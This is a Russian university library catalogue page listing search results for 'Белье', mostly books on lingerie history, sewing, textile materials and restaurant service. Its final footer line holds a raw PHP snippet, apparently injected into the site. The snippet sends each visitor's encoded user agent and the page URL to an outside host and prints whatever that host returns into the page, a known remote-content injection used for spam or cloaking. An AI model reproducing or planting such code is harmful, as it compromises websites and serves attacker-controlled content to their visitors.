Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

322 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Белье")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 35
1. 
Резанова, Наталия Юрьевна. Богиня в нежном неглиже. История дамского белья, рассказанная серьезно и не очень [Текст] / Н. Ю. Резанова, 2013. - 180, [3] с.
Держатели документа (Информация об экземплярах) 
2. 
Кобякова, Наталия Константиновна. Вышивка стиля модерн [Текст] / Н. К. Кобякова, 2005. - 61, [21] с.
Держатели документа (Информация об экземплярах) 
3. 
Практикум по производственному обучению профессии "Портной" [Текст] / Т. В. Могузова [и др.], 2010. - 108, [1] с.
Держатели документа (Информация об экземплярах) 

Практикум содержит теоретическую информацию и проверочные работы по различным темам: ручные, машинные и влажно-тепловые работы, изготовление постельного белья, ночной сорочки, юбки, брюк и др. Рассмотрены обработка деталей и узлов, технологическая последовательность изготовления швейного изделия. Приведены задания для самостоятельной работы, проверочные тесты.

Для учащихся образовательных учреждений начального профессионального образования.

4. 
Раскрой и пошив детского белья и одежды [Текст], 2000. - 35 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
5. 
Стельмашенко, Валентина Ильинична. Материалы для изготовления и ремонта одежды [Текст] / В. И. Стельмашенко, Т. В. Розаренова, 1997. - 281 с.
Держатели документа (Информация об экземплярах) 

Дана характеристика ассортимента материалов для верхней и легкой одежды. Рассмотрены свойства тканей для верха одежды, прокладочных и подкладочных тканей, отделочных материалов, а также натуральных и искусственных меха и кожи. Описаны принципы конфекционирования материалов при изготовлении, ремонте и обновлении одежды.

Для студентов вузов и инженерно-технических работников, изготавливающих одежду.

6. 
Лин, Жак. Техника кроя [Текст] / Ж. Лин ; пер.: А. Д. Клепцов, З. И. Клепцова, 1984. - 222 с.
Держатели документа (Информация об экземплярах) 
7. 
Дрожжин, Владимир Иванович. Справочник по швейно-трикотажному производству [Текст] / В. И. Дрожжин, Н. В. Орещенкова, 1982. - 205, [1] с.
Держатели документа (Информация об экземплярах) 
8. 
Кибалова, Людмила. Иллюстрированная энциклопедия моды [Текст] / Л. Кибалова, О. Гербенова, М. Ламарова ; пер.: И. М. Ильинская, А. А. Лосева, 1986. - 608 с.
9. 
Орленко, Любовь Васильевна. Конфекционирование материалов для одежды [Текст] / Л. В. Орленко, Н. И. Гаврилова, 2006. - 286 с.
Держатели документа (Информация об экземплярах) 

Учебное пособие посвящено вопросу современного материаловедения - рациональному и научно обоснованному выбору материалов, используемых при изготовлении различных видов швейных изделий. В пособии рассмотрены основные принципы, задачи и организация конфекционирования материалов, связи конфекционирования с маркетингом и качеством одежды; освещены вопросы конфекционирования материалов для отдельных групп и видов одежды; сформулированы требования к свойствам материалов и даны сведения об их ассортименте для конкретных видов изделий; дана характеристика основных ассортиментов групп всех видов материалов (текстильных и нетекстильных), которые применяются в настоящее время в производстве одежды. В приложение включен раздел об организации деловой игры при конфекционировании материалов, выполнение которой будет способствовать развитию у студентов творческого комплексного подхода к решению практических задач, закреплению полученных знаний.

10. 
Субеева, Нэля Александровна. Организация питания в курортных и гостиничных комплексах [Текст] : учеб. пособие: в 2 ч. Ч. 1 : Организация обслуживания на предприятиях общественного питания, 2010. - 84 с.
Держатели документа (Информация об экземплярах) 

Учебное пособие состоит из 2 частей. В 1 части пособия рассматриваются порядок обслуживания посетителей на предприятиях общественного питания, особенности организации обслуживания и предоставления услуг на предприятиях различных типов и классов, современные методы и формы обслуживания. БОльшое внимание уделяется подготовке ресторанов, баров к обслуживанию потребителей. Дана характеристика всех видов столовой посуды и приборов, сервировки столов; уделено большое внимание правилам подачи блюд. Во 2 части пособия будут рассмотрены вопросы организации питания иностранных туристов, а также организация диетического питания в курортных комплексах.

Цель учебного пособия - помочь студентам в изучении таких теоретических вопросов, как организация обслуживания на предприятиях общественного питания, основные правила обслуживания потребителей, а в дальнейшем применять полученные знания на практике. Составлено в соответствии с рабочей программой по данной дисциплине для студентов дневного отделения. Пособие предназначено для студентов, обучающихся по специальности 230500 Социально-культурный сервис и туризм, специализация "Гостиничный сервис".

Полный текст
11. 
Пасько, Ольга Владимировна. Организация обслуживания на предприятиях общественного питания [Текст] / О. В. Пасько, Н. В. Бураковская, Е. В. Кулагина, 2014. - 210 с.
Держатели документа (Информация об экземплярах) 

Целью написания данного труда является формирование у студентов знаний специфики, особенностей организации сервисного обслуживания на предприятиях общественного питания, функционирующих при гостиницах и иных средствах размещения.

В пособии дана характеристика типов предприятий общественного питания, изложен процесс информационного сопровождения предоставления услуг питания, показаны особенности разных форм и методов обслуживания клиентов, описаны перспективные направления развития сервиса и услуг общественного питания.

Пособие разработано в соответствии с рабочей программой подготовки студентов направления 100100.62 "Гостиничное дело", профиля подготовки "Ресторанная деятельность" и адресовано студентам дневной и заочной форм обучения.

Полный текст
12. 
Пятьсот полезных советов [Текст], 1972. - 448 с.
Держатели документа (Информация об экземплярах) 
13. 
Индексы потребительских цен на товары в Омской области в сентябре 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 34 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЙ -- НЕПРОДОВОЛЬСТВЕННЫЙ -- МЯСО -- РЫБА -- МАСЛО -- МОЛОКО -- ЯЙЦО -- САХАР -- ШОКОЛАД -- ЧАЙ -- КОФЕ -- МУКА -- ХЛЕБ -- КРУПА -- ОВОЩИ -- ФРУКТЫ -- ВОДКА -- ВИНО -- ТКАНЬ -- ОДЕЖДА -- БЕЛЬЕ -- МЕХ -- ТРИКОТАЖ -- ОБУВЬ -- ГАЛАНТЕРЕЯ -- ТАБАК -- МЕБЕЛЬ -- КОВЕР -- ПОСУДА -- ЧАСЫ -- ЭЛЕКТРОТОВАРЫ -- КАНЦТОВАРЫ -- ТЕЛЕРАДИОТОВАРЫ -- КОМПЬЮТЕР -- СВЯЗЬ -- ИГРУШКА -- МАТЕРИАЛ -- СТРОИТЕЛЬНЫЙ -- ЮВЕЛИРНОЕ -- ИЗДЕЛИЕ -- АВТОМОБИЛЬ -- БЕНЗИН -- МЕДИЦИНСКИЙ -- МЕДИКАМЕНТЫ -- ТОПЛИВО -- САДОВОДСТВО
Держатели документа (Информация об экземплярах) 
14. 
Товароведение и экспертиза непродовольственных товаров [Текст] : словарь-справочник / С. А. Вилкова [и др.] ; под ред. С. А. Вилковой, 2009. - 263 с.
15. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
16. 
Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для колледжей и проф.-техн. лицеев, уч-щ / сост. Л. А. Радченко, 2001. - 372 с.
17. 
Пасько, Ольга Владимировна. Организация обслуживания на предприятиях общественного питания [Электронный ресурс] / О. В. Пасько, Н. В. Бураковская, Е. В. Кулагина, 2014. - 1 r=on-line. - 210 с.
Держатели документа (Информация об экземплярах) 

Целью написания данного труда является формирование у студентов знаний специфики, особенностей организации сервисного обслуживания на предприятиях общественного питания, функционирующих при гостиницах и иных средствах размещения.

В пособии дана характеристика типов предприятий общественного питания, изложен процесс информационного сопровождения предоставления услуг питания, показаны особенности разных форм и методов обслуживания клиентов, описаны перспективные направления развития сервиса и услуг общественного питания.

Пособие разработано в соответствии с рабочей программой подготовки студентов направления 100100.62 "Гостиничное дело", профиля подготовки "Ресторанная деятельность" и адресовано студентам дневной и заочной форм обучения.

Полный текст
18. 
Главчева С. И. Организация производства и обслуживание в ресторанах и барах [Текст] / С. И. Главчева, Л. Е. Чередниченко, 2012. - 205 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- БИЗНЕС РЕСТОРАННЫЙ -- РЕСТОРАЦИЯ РУССКАЯ -- РЕСТОРАЦИЯ ЗАРУБЕЖНАЯ -- РЕСТОРАН - ИСТОРИЯ -- РЕСТОРАН -- БАР -- ПОСУДА СТОЛОВАЯ -- ПОСУДА ФАРФОРОВАЯ -- ПОСУДА ФАЯНСОВАЯ -- ПОСУДА ХРУСТАЛЬНАЯ -- ПОСУДА СТЕКЛЯННАЯ -- ПОСУДА МЕТАЛИЧЕСКАЯ -- БЕЛЬЕ СТОЛОВОЕ -- СЕРВИРОВКА СТОЛА -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ЦЕХ ДОГОТОВКИ -- ЦЕХ ОБРАБОТКИ ЗЕЛЕНИ -- ОРГАНИЗАЦИЯ ТРУДА -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ОРГАНИЗАЦИЯ ОБСЛУЖИВАНИЯ -- ВСТРЕЧА ПОТРЕБИТЕЛЕЙ -- ПРИЕМ ЗАКАЗА -- РАСЧЕТ С ПОСЕТИТЕЛЯМИ -- ЗАМЕНА ПОСУДЫ -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- КАРТА СИГАРНАЯ -- КАРТА КАЛЬЯННАЯ -- КАЛЬЯН -- ПОДАЧА БЛЮД -- БАНКЕТ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- КОФЕ - BREAK -- БАНКЕТ - ЧАЙ -- ФОНДЮ -- СТОЛ ШВЕДСКИЙ -- ОБСЛУЖИВАНИЕ ПРАЗДНИЧНЫХ ВЕЧЕРОВ -- КЕЙТЕРИНГ -- ПЕРСОНАЛ ОБСЛУЖИВАЮЩИЙ -- ПЕРСОНАЛ РЕСТОРАНА -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- БАРМЕН

В учебном пособии описана организация обслуживания потребителей в ресторанах и барах с учетом современных требований рынка, отечественного и зарубежного опыта, рассмотрены особенности проведения различных мероприятий и банкетов. Представлена организация проведения новых видов обслуживания по типу «сырной тележки», кейтеринга, предложены примеры написания винной, сигаретной, коньячной и кальянной карт. Приведены описания состава и организации работы производственных помещений и помещений для потребителей, их оснащения современным оборудованием, мебелью, а также характеристика различных видов ресторанной и барной посуды и белья.

Пособие предназначено для студентов вузов, а также работников предприятий общественного питания.

19. 
Бирюкова, Вера Васильевна. Технология обслуживания в общественном питании [Электронный ресурс] / В. В. Бирюкова, Н. В. Шевченко, 2013. - 1 o=эл. опт. диск (CD-ROM)
Оглавление 
Держатели документа (Информация об экземплярах) 

Учебное электронное издание представляет собой учебное пособие, в котором освещены вопросы совершенствования обслуживания на предприятиях общественного питания, информационное обеспечение процесса обслуживания, этапы его организации, услуги по организации обслуживания иностранных туристов и на социально ориентированных предприятиях питания. Особое внимание уделено особенностям торговых помещений ресторанов, их характеристике и оснащению, формам обслуживания; выбору столовой посуды, приборов, белья; обслуживанию приемов и банкетов.

Предназначено для студентов специальности 080502 "Экономика и управление на предприятии (торговля и общественное питание)" очной, очно-заочной и заочной форм обучения.

Полный текст
20. 
Богушева В. И. Бары и рестораны. Искусство обслуживания [Текст] : Искусство обслуживания / В. И. Богушева, 1999. - 351 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3214 - 28.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.25 с.12 запросов, 0.69c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;